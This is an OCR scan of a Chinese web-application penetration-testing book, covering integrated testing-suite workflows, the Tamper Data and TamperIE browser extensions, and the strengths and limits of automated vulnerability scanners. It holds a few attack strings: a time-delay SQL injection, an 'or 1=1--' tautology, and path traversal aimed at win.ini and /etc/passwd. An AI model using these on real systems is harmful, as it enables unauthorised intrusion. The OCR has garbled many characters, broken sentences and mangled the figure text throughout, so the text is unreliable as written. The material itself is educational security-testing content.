口 平台 独立 性 ， 可 在 所 有 常用 操作 系统 上 运行 这 些 工具 。 





























20.2.2 测试 工作 流程 


使 用 集成 测试 套件 的 典型 工作 流程 如 图 20-14 所 示 。 每 个 测试 阶段 所 涉及 的 关键 步骤 将 在 整 
本 书 中 详细 介绍 , 并 在 第 21 草 的 方法 论 中 列 出 。 此 处 介绍 的 工作 流程 说 明了 测试 套件 的 不 同 组 件 
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与 该 方法 论 之 间 的 对 应 关系 。 

在 此 工作 流程 中 , 测试 员 将 使 用 浏览 豆 推 动 整 个 测试 流程 。 在 通过 拦截 代理 服务 融 浏 览 应 用 
程序 时 ， 测 试 套件 将 编译 以 下 两 类 关键 信息 。 

口 代理 服务 器 历史 记录 ， 记 录 通 过 代理 服务 器 传送 的 每 一 个 请 求 和 响应 。 

口 站 点 地 图 ， 记 录 在 目标 的 目录 树 视 图 中 发 现 的 所 有 项 目 。 

(注意 ， 在 以 上 两 种 情况 下 ， 显 示 需 的 默认 过 滤 需 可 能 会 隐藏 某 些 通常 在 测试 时 没有 用 处 的 
项 目 。) 

如 第 4 章 所 述 ， 在 测试 应 用 程序 时 ， 测 试 套件 通常 会 对 发 现 的 内 容 进行 被 动 抓 取 。 这 一 操作 
将 使 用 通过 代理 服务 器 传送 的 所 有 请 求 更 新 站 点 地 图 ， 并 添加 基于 代理 服务 器 传送 的 响应 确定 
(通过 解析 链接 、 表 单 、 脚 本 等 ) 的 项 目 。 使 用 浏览 器 手动 确定 应 用 程序 的 可 见 内 容 后 ， 还 可 以 
使 用 “和 候 虫 ”和 “内 容 查 找 ” 功 能 主动 探查 应 用 程序 的 其 他 内 容 。 这 些 工具 的 输出 表单 也 将 添加 
到 站 点 地 图 中 。 
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识别 与 分 析 ， 
拦截 代理 
服务 器 
am 
代理 服务 器 
历史 记录 


We 


受 攻 击 面 










































锌 动 要 摘 漏洞 检测 和 利用 ‘ 


在 麟 宽 融 中 确 
认 茶 些 漏洞 









模糊 视 试 帮 
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图 20-14 ”使 用 集成 测试 套件 的 典型 工作 流程 
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解析 应 用 程序 的 内 容 和 功能 后 ,就 可 以 开始 评估 它 的 受 攻 击 面 。 受 攻击 面 是 各 种 功能 和 请 求 
的 集合 ， 测 试 员 应 对 其 进行 仔细 检查 ， 以 尝试 发 现 和 利用 相关 源 润 。 

通 利 ,在 测试 漏洞 时 ， 可 以 从 代理 服务 硕 拦 堆 窗 口 、 代 理 服务 大 历史 记录 或 站 点 地 图 中 选择 
项 目 ， 然 后 将 这 些 项 目 传送 给 其 他 工具 ， 以 执行 特定 的 任务 。 如 前 所 述 ， 可 以 使 用 模糊 测试 探查 
基于 输入 的 漏洞 ， 并 实施 其 他 攻击 ， 如 截取 敏感 信息 ; 可 以 通过 漏洞 扫描 需 使 用 被 动 和 主动 技巧 
自动 查找 常见 漏洞 ; 可 以 使 用 令 有 牌 分 析 带 工具 测试 会 话 cookie 和 其 他 令 有 牌 的 随机 性 ; 还 可 以 使 用 
请 求 Repeater 修 改 单 个 请 求 ， 然 后 不 断 提 出 这 个 请 求 ， 以 探查 漏洞 或 利用 已 发 现 的 缺陷 。 通 党 ， 
测试 员 需 要 在 这 些 不 同 的 工具 之 间 来 回 传送 各 个 项 目 。 例 如 , 测试 员 可 以 从 模糊 测试 攻击 中 选择 
某 个 感 兴趣 的 项 目 ， 或 选择 由 漏洞 扫描 融 报告 的 问题 ， 并 将 其 传送 给 请 求 Repeater， 以 验证 漏洞 
是 否 存在 ， 或 对 攻击 进行 优化 。 

通常 ， 对 于 许多 类 型 的 漏洞 ， 测 试 员 需 要 返回 浏览 句 以 作 进 一 步调 查 ， 确 认 某 个 明显 的 漏 酒 
是 否 确实 存在 ， 或 测试 正在 进行 的 攻击 。 例 如 ， 使 用 漏洞 扫描 大 或 请 求 Repeater 发 现 跨 站 点 脚本 
漏洞 后 ,可 以 将 生成 的 URL 粘 贴 到 浏览 右 中 ， 以 确认 概念 验证 攻击 是 否 会 执行 。 测 试 可 能 的 访问 
控制 漏洞 时 ， 可 以 查看 当前 浏览 硕 会 话 中 特定 请 求 的 结果 ， 以 在 特定 用 户 权 限 下 确认 这 些 结 采 。 
如 有 果 发 现 可 用 于 提取 大 量 信 息 的 SQL 注 和 漏洞， 浏览 希 是 显示 相关 结果 的 最 有 利 的 位 置 。 

测试 员 并 不 需要 严格 遵循 本 市 介绍 的 工作 流程 , 也 不 应 受到 该 流程 的 任何 限制 。 在 许多 情况 
下 , 可 以 下 接 在 浏览 帮 或 代理 服务 帮 拦 稚 窗 口中 输入 意外 输入 来 测试 漏洞 。 一 些 漏洞 可 能 会 立即 
在 请 求 和 啊 应 中 表露 出 来 ， 而 无 须 使 用 任何 更 具 针 对 性 的 工具 。 为 实现 特定 的 目的 , 可 以 引入 其 
他 工具 , 还 可 以 以 本 市 并 未 介绍 的 创新 性 方式 , 甚至 连 工具 开发 者 都 未 想到 的 方式 组 合 使 用 测试 
僚 件 的 各 个 组 件 。 利 用 各 种 相互 天 联 的 特性 ,集成 测试 登 件 可 发 挥 非常 强大 的 功能 。 在 使 用 它们 
时 越 有 创造 性 ， 就 越 有 可 能 发 现 最 隐秘 的 漏洞 。 





















































20.2.3 ”拦截 代理 服务 器 替代 工具 


应 该 在 工具 包 中 始终 保留 一 个 工具 , 以 备 在 极 少数 常用 的 基于 代理 服务 器 的 工具 无 法 使 用 的 
情况 下 使 用 。 在 需要 使 用 非 标准 的 验证 方法 直接 或 通过 企业 代理 服务 器 访问 应 用 程序 ,或 者 应 用 
程序 使 用 不 篆 用 的 客户 端 SSL 证 书 或 浏览 需 扩 展 时 ， 往 往 需 要 使 用 替代 工具 。 在 这 些 情 况 下 ， 因 
为 拦截 代理 服务 需 会 中 断 客户 端 与 服务 需 之 间 的 HTTP 连 接 ， 使 用 基于 代理 服务 需 的 工具 可 能 
法 访问 应 用 程序 的 一 部 分 或 全 部 功能 。 

这 时 ， 和 澡 规 的 替代 方法 是 使 用 内 藤 在 浏览 硕 内 的 工具 监控 和 操纵 浏览 需 生 成 的 HTTP 请 求 。 
从 理论 上 讲 , 此 时 客户 端 执 行 的 全 部 操作 以 及 辐 服 务 需 提交 的 所 有 数据 , 仍然 由 测试 员 完 全 控制 。 
如 果 硕 望 拥 有 控制 权 , 可 以 编写 完全 定制 的 浏览 融 来 执行 所 需 的 任何 任务 。 使 用 这 些 浏 览 需 扩 展 
的 目的 在 于 帮助 标准 浏览 硕 迅 速 高 效 地 实现 其 功能 , 而 不 会 干扰 浏览 硕 与 服务 硕 之 间 的 网 络 层 通 
信 。 因 此 , 测试 员 可 以 通过 这 种 方法 回应 用 程序 提交 任意 请 求 ， 同 时 使 用 浏览 带 与 存在 问题 的 应 
用 程序 进行 正常 通信 。 

Internet Explorer 与 Firefox 都 有 大 量 扩展 ， 它 们 的 功能 基本 相似 。 我 们 将 分 别 举 出 一 个 示例 ， 
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同时 也 建议 测试 员 首 先 试用 各 种 扩展 ， 然 后 再 从 中 选择 最 适合 上 自己 的 一 种 。 

还 要 注意 ， 与 主要 的 工具 套件 相 比 ， 当 前 训 览 融 扩 展 的 功能 有 限 。 它 们 不 能 进行 任何 抓 取 、 
模糊 测试 或 漏洞 扫描 , 而 且 使 用 它们 必须 完全 手动 操作 。 但是, 在 某 些 情 况 下 仍然 需要 使 用 它们 ， 
为 它们 可 帮助 渗透 测试 员 对 攻击 目标 实施 仪 使 用 标准 浏览 句 无 法 实现 的 全 面 攻击 。 

1. Tamper Data 

Tamper Data 是 一 个 Firefox 浏 览 融 扩展 。 任 何 时 候 ， 只 要 提交 一 个 表单 ，Tamper Data 就 会 弹 
出 一 个 对 话 框 ， 显 示 与 请 求 有 关 的 所 有 信息 (包括 HTTP 消 息 头 与 参数 )， 并 允许 查看 和 修改 这 些 
内 容 ， 如 图 20-15 所 示 。 

















Tamper Popup 区 司 
http://mdserc.net/search/11/Default.aspx 
| 和 ee Header Name | Rec heme Value | Post Parameter Name Post Parameter Value 
Host mdsec.net _WVIEWSTATE 3%2FwEPDwUKMTQDMzg2MT( | 
User-Agent Mozilla/5.0 (Windows NT 6,1; SearchTerm test 
Accept text/html,application/xhtml+ SearchButton Search 
Accept-Language en-gb,en;q=0.5 searchtype 1| 
Accept-Encoding gzip, deflate 
Accept-Charset 1SO-8859-1,utf-8;q=0.7,*q=0 
Keep-Alive 115 
| Connectior keep-alive 
Referer http://mdsec.nst/search/11/| 














[| Cancel | 








图 20-15 ”在 Firefox 中 使 用 Tamper Data 修 改 HTTP 请 求 


2. TamperlE 
TamperIE 是 一 个 Internet Explorer 浏 览 硕 扩展 , 它 的 功能 与 Firefox 浏 览 锅 的 Tamper Data 扩 展 的 
功能 基本 相同 ， 如 图 20-16 所 示 。 
有 
wa Internet Explorer is attempting to send data to the following page: 


http: /f/mdsec.net/search/11/Default,aspx 
You may tamper with this dats using this dialog., Configure this tool,,, 





WW Send altered data 


次 5end orginal data 








Raw POST | PrettyPOST 








图 20-16 ”在 Internet Explorer 中 使 用 TamperIE 修 改 HTTP 请 求 
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20.3 ”独立 漏洞 扫 搓 器 


有 许多 工具 可 目 动 对 Web 应 用 程序 进行 漏洞 扫描 。 这 些 扫描 带 的 主要 优 点 是 ， 能 够 在 相对 较 
短 的 时 间 内 测试 大 量 功 能 ， 并 且 能 够 发 现 第 见 应 用 程序 中 存在 的 各 种 重要 源 洞 。 

Web 应 用 程序 漏洞 扫描 带 能 够 目 动 执行 本 书 中 介绍 的 各 种 测试 技巧 ,包括 应 用 程序 抓 取 , 查 
找 天 认 与 贡 见 内 容 ， 以 及 探查 贡 见 的 狮 洞 。 在 解析 应 用 程序 的 内 容 后 ， 扫 措 带 将 训 览 它 的 功能 ， 
在 每 个 请 求 的 每 一 个 参数 中 提交 一 系列 测试 字符 串 ,， 然后 分 析 应 用 程序 的 啊 应 ,从 中 查找 笛 见 犹 
洞 的 签名 。 接 下 来 ， 扫 摘 檀 生成 一 个 报告 ,描述 它 发 现 的 每 一 个 漏洞 。 通 第 ， 这 份 报告 中 包括 用 
于 诊断 每 一 个 被 发 现 的 独 洞 的 请 求 与 啊 应 ,允许 经 验 丰富 的 用 户 对 它们 进行 手动 调查 ,确认 漏 洞 
征 否 存在 。 

决定 是 否 以 及 何 时 使 用 一 个 漏洞 扫描 希 的 关键 在 于 , 理解 这 些 工具 的 内 在 优 缺 点 与 在 开发 它 
们 的 过 程 中 面临 的 挑 成 。 这 些 邯 虑 事项 还 会 影 啊 能 个 充 分 利用 一 个 目 动 扫描 融 ,， 以 及 如 何 解释 与 
是 否 信任 它 的 扫描 结 


20.3.1 扫 搬 器 探测 到 的 漏洞 


使 用 扫描 右 可 以 相当 可 徘 地 探测 到 几 种 常见 的 漏洞 。 这 些 漏洞 都 有 非常 明显 的 签名 。 有些 情 
况 下 ， 这些 签名 就 在 应 用 程序 的 常见 请 求 与 啊 应 中 。 还 有 些 情 况 下 ， 如 果 确 定 源 洞 已 经 存在 , 扫 
措 硕 会 发 送 一 个 专门 设计 的 请 求 ,， 以 触发 它 的 签名 。 如 末 签 名 出 现在 应 用 程序 对 这 个 请 求 的 啊 应 
中 ， 那 么 扫 摘 条 束 可 据 此 推 朵 ， 漏 洞 确实 存在 。 

下 面 列 出 几 个 可 以 通过 这 种 方法 探测 到 的 漏洞 。 

口 反射 型 路 站 点 脚本 漏洞 。 如 条 用 户 提交 的 输入 未 经 过 适当 的 桨 化 ,在 应 用 程序 的 啊 应 中 
“反射 ”回来 ， 台 会 出 现 这 种 漏洞 。 目 动 扫 描 硕 通 第 会 发 送 包 含 HTML 标 记 的 测试 字符 串 ， 
然后 在 啊 应 中 搜索 这 些 字 符 串 ， 从 而 确定 许多 这 种 类 型 的 瀚 洞 。 

D 一 些 SQL 注 入 漏洞 可 通过 某 个 签名 确定 。 例 如 , 提交 一 个 单 引号 可 能 会 导致 应 用 程序 返 
一 条 ODBC 错 误 消 息 ; 或 者 ， 提 交 字 符 串 ' ，waitfor delay '0:0:30'-- 可 能 会 造 
时 间 延 人 壕 。 

口 一 些 路 人 径 裔 历 漏洞 可 通过 提交 一 个 针对 某 个 已 知 文 件 (如 win.ini 或 /etc /passwd ) 的 
届 有 历 序 列 ， 然 后 在 请 求 中 搜索 该 文件 是 否 出 现 ， 从 而 进行 确定 。 

口 一 些 命令 注入 漏洞 可 通过 注入 一 个 引起 时 间 延 退 ， 或 者 将 某 个 特殊 的 字符 串 “ 反 射 ” 到 
应 用 程序 的 啊 应 中 的 命令 确定 。 

口 耳 接 目录 列表 可 通过 请 求 目 录 路 径 ， 然 后 寻找 一 个 包含 看 似 为 目录 列表 的 文本 的 啊 应 ， 
从 而 加 以 确定 。 

口 明文 密码 提交 、 范围 党 沁 的 cookie、 激 活 目 动 完 成 的 表单 等 源 洞 可 通过 审查 应 用 程序 提出 的 
第 见 请 求 与 响应 有 效 确定 。 

口 通常 ， 使 用 不 同 的 文件 扩展 名 请 求 每 个 枚 从 出 的 资源 ， 可 以 发 现在 主要 的 公布 内 容 中 没 
有 提供 链接 的 数据 ， 如 备份 文件 和 资源 文件 。 
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对 上 面 的 许多 漏洞 而 言 ， 有 了 时候， 使 用 一 个 标准 的 攻击 字符 串 和 签名 无 法 有 效 探测 到 相同 
类 型 的 漏洞 。 例 如 ， 为 阻止 基于 输入 的 漏洞 ， 应 用 程序 会 执行 某 种 使 用 专门 设计 的 输入 即 可 避 
开 的 不 完善 的 输入 确认 。 普 通 的 攻击 字符 串 将 被 阻止 或 净化 ; 但 是 ， 经 验 丰 富 的 攻击 者 能 人 够 探 
查 到 应 用 程序 实施 的 输入 确认 ， 并 找到 避 开 这 种 确认 的 方法 。 其 他 情况 下 ， 标 准 的 攻击 字符 串 
可 能 会 触发 一 个 漏洞 ， 但 不 会 生成 想 要 的 签名 。 例 如 ， 许 多 SQL 注入 攻 击 并 不 会 导致 应 用 程序 
向 用 户 返 回 任何 数据 或 错误 消息 ; 同样 ， 路 径 遍 历 漏洞 也 不 会 让 目标 文件 的 内 容 在 应 用 程序 的 
响应 中 直接 返回 。 
此 外 ， 有 几 种 重要 的 漏洞 并 没有 明确 的 签名 ， 使 用 一 组 标准 的 攻击 字符 串 也 无 法 发 现 它 们 。 
通常 ， 自 动 扫描 需 并 不 能 发 现 这 种 类 型 的 漏洞 。 下 面 是 一 些 扫描 需 无 法 准确 判定 的 漏洞 。 
口 不 完善 的 访问 控制 。 这 种 漏洞 可 使 用 户 能 够 访问 其 他 用 户 的 数据 ， 或 者 允许 低 权 限 用 户 
访问 管理 功能 。 扫 描 恬 不 了 解 应 用 程序 的 访问 控制 要 求 ， 也 不 能 评估 使 用 任何 特殊 的 用 
户 账户 发 现 的 各 种 功能 和 数据 的 重要 性 。 

口 通过 修改 参数 值 给 应 用 程序 的 行为 造成 影响 的 攻击 。 例 如 ， 修 改 一 个 表示 商品 价格 或 订 
单 状态 的 隐藏 字段 。 扫 摘 需 并 不 了 解 任何 参数 在 实现 应 用 程序 功能 过 程 中 所 发 挥 的 作用 。 

口 其 他 逻辑 错误 ， 如 使 用 负 值 突破 交易 限额 ， 或 者 通过 省 略 一 个 关键 的 请 求 参 数 避 开 账 户 

恢复 过 程 的 某 个 阶段 。 
口 应 用 程序 功能 设计 方面 的 漏洞 ， 如 脆弱 密码 强度 规则 ， 从 登录 失败 消息 中 枚 举 用 户 的 功 
能 ， 以 及 保密 性 不 强 的 忘记 密码 提示 。 

口 会 话 劫 持 攻击 。 攻 击 者 可 在 应 用 程序 的 会 话 令 牌 中 找到 一 个 序列 ， 伪 装 成 其 他 用 户 。 即 
使 扫描 融 能 确定 某 个 参数 在 连续 登录 过 程 中 使 用 了 一 个 可 以 预测 的 值 ， 但 它 仍然 不 能 理 
解 修改 该 参数 导致 出 现 的 不 同 内容 的 意义 。 

口 泄露 敏感 信息 ， 如 用 户 名 列表 和 包含 会 话 令 牌 的 日 志 。 

一 些 漏洞 扫描 器 尝试 检查 上 述 某 些 漏洞 。 例 如 , 某 些 扫 摘 器 尝试 以 两 个 不 同 的 用 户 身份 登录 ， 
并 确定 一 名 用 户 无 须 正 确 授 权 即 可 访问 的 数据 和 功能 , 以 此 确定 访问 控制 漏洞 ,根据 笔者 的 经 验 ， 
这 些 类 型 的 检查 通常 会 生成 大 量 错误 警报 和 漏 报 。 

在 前 面 列 出 的 两 组 漏洞 中 , 每 一 组 都 包含 明显 的 漏洞 ,也 就 是 那些 可 被 技术 尚 不 熟练 的 攻击 
者 发 现 和 利用 的 漏洞 。 因 此 ， 虽 然 自 动 扫 描 顺 能 够 探查 到 应 用 程序 中 存在 的 大 部 分 明显 的 漏洞 ， 
但 它 还 是 会 遗漏 许多 这 类 漏洞 ， 其 中 包括 一 些 非常 明显 的 漏洞 ， 只 要 进行 手动 扫描 即 可 探测 到 。 
自动 扫描 器 根本 不 能 提供 任何 保证 , 证 明 应 用 程序 中 不 存在 一 些 可 被 攻击 者 轻易 发 现 和 利用 的 严 
重 漏洞 。 

同样 ， 对 于 当前 必须 经 过 严格 测试 的 、 更 注重 安全 的 应 用 程序 而 言 ， 其 中 存在 的 漏洞 更 多 的 
是 那些 出 现在 第 二 个 列表 而 不 是 第 一 个 列表 中 的 漏洞 。 


20.3.2 ” 扫 搬 器 的 内 在 限制 


市 场 上 最 优秀 的 漏洞 扫描 带 是 由 那些 认真 思考 如 何 探 查 各 种 Web 应 用 程序 源 洞 的 专家 所 设 
计 和 执行 的 。 无 疑 ， 他们 设计 的 扫 撞 带 仍 不 能 有 效 发 现 许多 类 型 的 汤 洞 。 要 设计 一 个 完全 日 动 化 
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的 Web 应 用 程序 测试 方法 ,我 们 面临 着 各 种 内 在 的 障碍 。 只 有 拥有 成 熟 的 人 工 智 能 引擎 ， 远 远 超 
越 当 前 扫 撒 硕 性 能 的 系统 ， 才 能 有 效 突破 这 些 障 但 。 
1. Web 应 用 程序 各 不 相同 
Web 应 用 程序 与 网 络 和 基础 架构 截然 不 同 。 通 第 ， 后 者 大 多 采用 标准 配置 的 非 定制 产品 。 从 
理论 上 讲 , 我 们 可 以 提前 为 所 有 可 能 的 目标 构建 一 个 数据 库 , 然后 创建 一 个 工具 探查 网 络 和 基础 
染 构 中 存在 的 漏洞 。 但 是 ,我 们 却 不 能 以 这 种 方式 探查 定制 Web 应 用 程序 中 的 漏洞 ; 因此 ， 任 何 
高 效 的 扫描 带 必 须 能 够 预见 意外 的 情况 。 
2. 扫描 器 不 理解 语法 
计算 机 擅长 分 析 应 用 程序 啊 应 的 语法 内 容 ， 能 够 识别 常见 的 错误 消息 、HTTP 状 态 人 码 与 被 复 
制 到 Web 页 面 中 的 用 户 提交 的 数据 。 然 而 ， 今 天 的 扫描 需 并 不 能 理解 这 些 内 容 的 语法 意义 ， 也 不 
能 根据 这 些 意义 做 出 合理 的 判断 。 例如, 在 更 新 购物 篮 的 功能 中 , 扫 摘 硕 能够 查看 提交 给 该 功能 
的 大 量 参数 。 扫 描 需 并 不 知道 哪个 参数 表示 数量 ， 哪 个 参数 表示 价格 。 另 外 ,， 它 也 不 能 判定 修改 
订单 的 数量 并 不 符合 逻辑 ， 而 可 修改 其 价格 则 代表 一 个 严重 的 漏洞 。 
3. 扫描 器 不 会 “即兴 ”处 理 
许多 Web 应 用 程序 使 用 非 标准 的 机 制 处 理会 话 与 导航 ， 传 送 和 处 理 数据 ,， 例 如， 通过 查询 字 
符 串 、cookie 或 其 他 参数 。 人 类 立即 能 够 注意 到 并 解析 这 些 不 筑 用 的 机 制 ， 但 计算 机 会 继续 逐 循 
它 的 标准 规则 。 而 且 ， 许 多 针对 Web 应 用 程序 的 攻击 需要 某 种 “即兴 ”处 理 ， 例 如 ， 部 分 避 开 有 
效 的 输入 过 滤 ， 或 者 利用 应 用 程序 行为 的 几 个 不 同方 面 为 攻击 创造 条 件 。 通 浓 ,， 扫描 需 没 有 能 
实施 这 些 攻 击 。 
4. 扫 摘 器 并 无 直 锅 
计算 机 并 不 能 凭 百 觉 发 现 最 住 的 攻击 方法 。 今天 的 扫 摘 带 末 用 的 攻击 方法 , 是 对 每 一 项 功能 
尝试 每 一 种 攻击 。 这 种 方法 在 所 能 执行 的 检查 种 类 以 及 组 合 这 些 检查 的 方式 上 存在 着 诸多 限制 。 
在 许多 情况 下 ， 这 种 方法 往往 会 忽略 漏洞 的 存在 ， 如 下 所 示 。 
口 一 些 攻击 需要 在 一 个 多 阶段 处 理 过 程 的 一 个 或 几 个 阶段 提交 专门 设计 的 输入 ， 然 后 完成 
整个 处 理 过 程 ， 并 观察 处 理 结 
口 一 些 攻 击 需 要 改变 应 用 程序 执行 某 个 多 阶段 处 理 的 预定 顺序 。 
口 一 些 攻击 需要 以 专门 设计 的 方式 修改 多 个 参数 的 值 。 例如 , 一 个 XSS 攻 击 需 要 在 一 个 参数 
中 插入 一 个 特殊 的 值 ， 使 得 应 用 程序 生成 错误 消息 ; 并 在 男 一 个 参数 中 插入 被 复制 到 错 
误 消息 中 的 XSS 有 效 载 位 。 
由 于 扫描 需 所 使 用 的 探查 漏洞 的 亦 力 方法 存在 的 实际 限制 , 它们 并 不 能 向 每 一 个 参数 或 者 每 
一 个 处 理 阶 段 提 交 所 有 攻击 字符 串 。 当 然 ， 也 没有 人 能 够 做 到 这 一 点 ; 但 是 ， 人 类 往往 能 够 “ 穴 
觉 ”可 能 存在 的 漏洞 、 开 发 者 做 出 的 某 种 假设 以 及 似乎 有 什么 不 太 正 和 常 的 位 置 。 因 此 ,渗透 测试 
员 会 选择 这 一 小 部 分 可 能 的 攻击 进行 实际 调查 ， 并 日 通 常 能 够 成 功 发 现 涯 润 。 


20.3.3 ” 扫 摘 器 面临 的 技术 挑战 
前 面 介绍 的 自动 控制 面临 的 障碍 导致 创建 一 个 有 效 的 源 洞 扫描 带 必 须 解 决 许多 特殊 的 技术 
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挑战 。 这 些 挑战 不 仅 会 损害 扫描 融 探 查 某 些 类 型 的 调 洞 的 能 力 〈 如 前 所 述 )， 而 且 会 损害 它 执行 
解析 应 用 程序 内 容 、 探 查 漏洞 等 核心 任务 的 能 
其 中 一 些 挑 战 并 非 无 法 克服 ,如 今 的 扫 摘 需 已 新 增 了 各 种 功能 , 可 在 一 定 程 度 上 克服 这 些 挑 
战 。 但 是 ， 扫描 并 不 是 一 种 完美 的 解决 方案 ， 现 代 扫 描 技 术 的 效率 因 不 同 应 用 程序 而 异 。 
1. 验证 与 会 话 处 理 
扫描 需 必 须 能 够 处 理 各 种 应 用 程序 使 用 的 验证 与 会 话 处 理 机 制 。 通 常 , 应 用 程序 的 绝 大 多 数 
功能 只 有 使 用 通过 验证 的 会 话 才 能 访问 ; 如 果 扫 描 闪 不 能 获得 这 样 的 会 话 , 它 就 会 遗漏 许多 可 以 
探测 的 漏洞 。 
当前 ， 扫 描 硕 用 户 通过 提供 一 段 登 录 脚 本 ， 或 者 使 用 内 置 的 浏览 希 完 成 验证 过 程 ， 帮 助 扫描 
人 条 按照 特定 的 步 又 获得 通过 验证 的 会 话 ， 从 而 解决 验证 方面 的 问题 。 
会 话 处 理 方面 的 挑战 更 难以 解决 ， 包 括 以 下 两 个 问题 。 
口 扫描 需 必 须 能 够 与 应 用 程序 使 用 的 会 话 处 理 机 制 交 互 。 这 可 能 要 求 在 cookie、 隐 藏 表单 字 
段 或 URL 碍 询 字 符 串 中 传送 会 话 令 牌 。 令 牌 可 能 在 整个 会 话 过 程 中 保持 静态 ， 或 者 根据 
每 个 请 求 而 发 生变 化 ， 或 者 应 用 程序 可 能 会 采用 一 种 完全 不 同 的 定制 机 制 。 
口 如 果 会 话 已 经 失效 ,扫描 右 必 须 能 够 了 解 这 一 情况 ， 并 返回 到 验证 阶段 获得 一 个 新 的 
会 话 。 造 成 会 话 失 效 的 原因 很 多 , 例如， 因为 扫描 带 请 求 了 退出 功能 ,或 者 因为 扫描 
从 进行 了 反 负 导航 或 提交 了 有 茶 种 无 效 的 输入 ， 导 致 应 用 程序 终止 了 会 话 。 在 最 初 解析 
应 用 程序 及 随后 探查 漏洞 的 过 程 中 ， 扫 措 禹 必须 能 够 探测 到 这 两 种 情况 。 如 采 会 话 失 
效 ， 不 同 的 应 用 程序 会 表现 出 不 同 的 行为 ; 而 扫描 硕 也 只 会 分 析 应 用 程序 啊 应 的 语法 
内 容 。 通 名 而 言 ， 这 可 能 是 一 个 难以 应 对 的 挑战 ， 应 用 程序 使 用 非 标 准 的 会 话 处 理 机 
制 时 尤其 如 此 。 
公平 地 讲 , 今天 的 一 些 扫描 需 能 够 检测 出 应 用 程序 采用 的 绝 大 多 数 验证 和 会 话 处 理 机 制 。 但 
是 ,仍然 存在 许多 扫 措 硕 无 法 处 理 的 情况 。 因 此 , 它们 可 能 无 法 抓 取 或 扫描 应 用 程序 的 主要 受 攻 
击 面 。 由 于 独立 扫描 融 完 全 以 目 动 方式 运行 ， 用 户 通 稼 难以 察 党 这 种 缺陷 。 
2. 危险 的 后 果 
在 许多 应 用 程序 中 , 不 苯 循 任何 指导 而 进行 无 限制 的 扫 找 , 可 能 会 给 应 用 程序 及 其 包含 的 数 
据 市 来 极 大 的 风险 。 例 如 ， 扫 描 硕 可 能 会 发 现 一 个 包含 章 设 密码 、 删 除 账 户 等 功能 的 管理 页 面 。 
扫描 如 奸 目地 请 求 每 一 项 功能 可 能 会 叶 致 应 用 程序 拒绝 所 有 用 户 的 访问 请 求 。 同样 , 扫描 右 可 能 
会 发 现 一 个 可 被 用 于 严重 破坏 应 用 程序 数据 的 独 洞 。 例 如 ， 在 一 些 SQL 注 入 漏洞 中 ， 提 交 标 准 的 
SQL 攻击 字符 串 ( 如 or 1=1-- ) 可 能 会 使 应 用 程序 的 数据 唱 受 无 法 预料 的 操作 。 这 时 ， 知 道 某 
项 特殊 功能 的 作用 的 人 会 赣 层 行事 ,但 目 动 扫 措 如 却 缺乏 这 种 认识 。 
3. “个 性 化 ”功能 
许多 时 候 ， 纯 粹 对 应 用 程序 进行 语法 分 析 并 不 能 准确 判定 它 的 核心 功能 : 
口 一 些 应 用 程序 虽 包 含 数目 庞大 的 内 容 ， 但 它们 体现 的 却 是 一 组 相同 的 核心 功能 。 例 如 ， 
eBay、MySpace 与 Amazon 这 些 应 用 程序 含有 数 百 万 个 包含 不 同 URL 与 内 容 的 不 同 应 用 程 
序 页 面 ， 但 这 些 页 面 仅 对 应 少数 几 个 应 用 程序 功能 。 
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口 如 采 仅 从 语法 角度 分 析 ， 一 些 应 用 程序 可 能 并 没有 明确 的 边界 。 例 如 ， 日 历 应 用 程序 允 
许 用 户 寻 航 至 任何 日 期 。 同 样 ， 一 些 内 容 有 限 的 应 用 程序 在 不 同 的 场合 采用 易 变 的 URL 
或 请 求 参数 访问 相同 的 内 容 ， 导 致 扫描 需 继续 对 应 用 程序 的 内 容 进 行 不 确定 的 解析 。 
口 扫描 希 本 吴 的 操作 可 能 会 导致 一 些 似 乎 是 全 新 的 内 容 出 现 。 例 如 ， 提 交 一 个 表单 可 能 会 使 
应 用 程序 在 界面 上 显示 一 个 新 的 链接 , 访问 这 个 链接 可 能 会 获得 万 外 一 个 作用 相同 的 表单 。 
在 上 述 任何 一 种 情 次 下 ， 渗 透 测 试 员 能 够 立即 “看 透 ”应 用 程序 的 请 求 内 容 ， 确 定 需要 测试 
的 核心 功能 ; 但 不 了 解 语 法 的 目 动 扫 摘 带动 很 难 做 到 这 一 点 。 
除 上 述 解 析 和 探查 应 用 程序 过 程 中 出 现 的 明显 问题 外 , 在 报告 已 发 现 的 漏洞 过 程 中 也 出 现 了 
一 个 相关 的 问题 : 纯粹 基于 语法 进行 分 析 的 扫描 带 很 可 能 会 重复 报告 同一 个 漏洞 。 例 如 ,一 个 扫 
描 报 告 确定 了 200 个 XSS 狂 洞 ， 其 中 有 195 个 出 现在 扫 搞 着 多 次 探查 的 同一 项 应 用 程序 功能 中 ， 因 
为 这 个 漏洞 通过 不 同 的 语法 内 容 出 现在 不 同 的 场合 中 。 
4. 其 他 自动 控制 挑战 
我 们 在 第 14 革 讲 过 ,一 些 应 用 程序 会 实施 专门 的 防御 措施 ,防止 目 动 化 客户 端 程序 访问 它们 。 
这 些 措施 包括 : 遇 到 反常 行为 时 反应 性 地 终止 会 话 ， 使 用 CAPTCHA 和 其 他 控件 确保 一 些 特殊 的 
请 求 由 茶 一 名 用 户 提 出 。 
通 前， 扫 摘 货 的 抓 取 功能 面临 和 Web 应 用 程序 爬虫 相同 的 挑战 ， 如 定制 化 “未 发 现 ” 啊 应 ， 
能 够 解释 客户 端 代码。 许多 应 用 程序 对 特殊 的 输入 项 ( 例如 ， 用户 注册 表单 中 的 字段 ) 进行 严格 
的 确认 。 如 采 扑 虫 癌 表单 提交 无 效 的 输入 ,并 且 不 能 理解 应 用 程序 生成 的 错误 消息 ,那么 它 就 无 
法 通过 这 个 表单 访问 它 之 后 的 一 些 重 要 功能 。 
Web 技 术 的 快速 发 展 ， 特 别 是 各 种 浏览 各 扩展 组 件 和 其 他 框架 在 客户 端 上 的 应 用 , 使 大 多 数 
扫 摘 帮 部 落后 于 最 新 的 技术 发 展 趋势 。 这 会 导 臻 扫描 帮 无 法 确定 在 应 用 程序 中 提出 的 所 有 相关 请 
求 ， 或 无 法 确定 应 用 程序 请 求 所 需 的 准确 格式 和 内 容 。 
此 外 ， 当 前 Web 应 用 程序 高 度 状 态 化 ， 以 及 复 杀 数据 在 客户 闫 和 服务 融 病 上 保存 并 通过 这 二 
者 之 间 的 异步 通信 进行 更 新 的 特点 ,都 会 为 大 多 数 倾 和 于 单独 处理 每 个 请 求 的 全 日 动 扫描 各 制 造 
问题 。 为 完全 洱 兰 这 些 应 用 程序 , 通常 有 必要 了 解 它 们 采用 的 多 阶段 请 求 过 程 ， 并 确保 应 用 程序 
